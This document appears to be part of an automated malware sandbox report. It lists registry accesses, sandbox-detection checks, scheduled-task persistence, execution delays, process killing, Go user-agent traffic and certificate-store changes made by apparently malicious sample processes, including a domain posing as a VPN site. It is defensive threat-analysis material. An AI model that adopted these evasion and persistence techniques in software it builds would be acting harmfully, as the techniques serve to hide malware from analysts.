Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters	DrvInst.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6A97.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6A97.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3tz26HrLg.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3tz26HrLg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5268	schtasks.exe
5648	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
5172	timeout.exe
2560	timeout.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

GoLang User-Agent 29 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	58556	Go-http-client/1.1
HTTP User-Agent header	97836	Go-http-client/1.1
HTTP User-Agent header	108584	Go-http-client/1.1
HTTP User-Agent header	161119	Go-http-client/1.1
HTTP User-Agent header	366	Go-http-client/1.1
HTTP User-Agent header	33498	Go-http-client/1.1
HTTP User-Agent header	72605	Go-http-client/1.1
HTTP User-Agent header	149338	Go-http-client/1.1
HTTP User-Agent header	33791	Go-http-client/1.1
HTTP User-Agent header	119892	Go-http-client/1.1
HTTP User-Agent header	124081	Go-http-client/1.1
HTTP User-Agent header	407	Go-http-client/1.1
HTTP User-Agent header	59848	Go-http-client/1.1
HTTP User-Agent header	85203	Go-http-client/1.1
HTTP User-Agent header	405	Go-http-client/1.1
HTTP User-Agent header	367	Go-http-client/1.1
HTTP User-Agent header	115656	Go-http-client/1.1
HTTP User-Agent header	115659	Go-http-client/1.1
HTTP User-Agent header	110494	Go-http-client/1.1
HTTP User-Agent header	127621	Go-http-client/1.1
HTTP User-Agent header	403	Go-http-client/1.1
HTTP User-Agent header	33787	Go-http-client/1.1
HTTP User-Agent header	108581	Go-http-client/1.1
HTTP User-Agent header	108578	Go-http-client/1.1
HTTP User-Agent header	137332	Go-http-client/1.1
HTTP User-Agent header	149346	Go-http-client/1.1
HTTP User-Agent header	408	Go-http-client/1.1
HTTP User-Agent header	33789	Go-http-client/1.1
HTTP User-Agent header	88485	Go-http-client/1.1

Kills process with taskkill 7 IoCs

evasion

pid	Process
3176	taskkill.exe
7040	taskkill.exe
1740	taskkill.exe
4116	taskkill.exe
4300	taskkill.exe
5608	taskkill.exe
5572	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	ww31.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	ww31.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	ww31.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-572 = "China Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	app.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	ww31.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	csrss.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d6938627f11ad701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "152"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}	vpn.tmp
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 72e17115f01ad701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\suggestive.com\Total = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\get-express-vpn.online\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
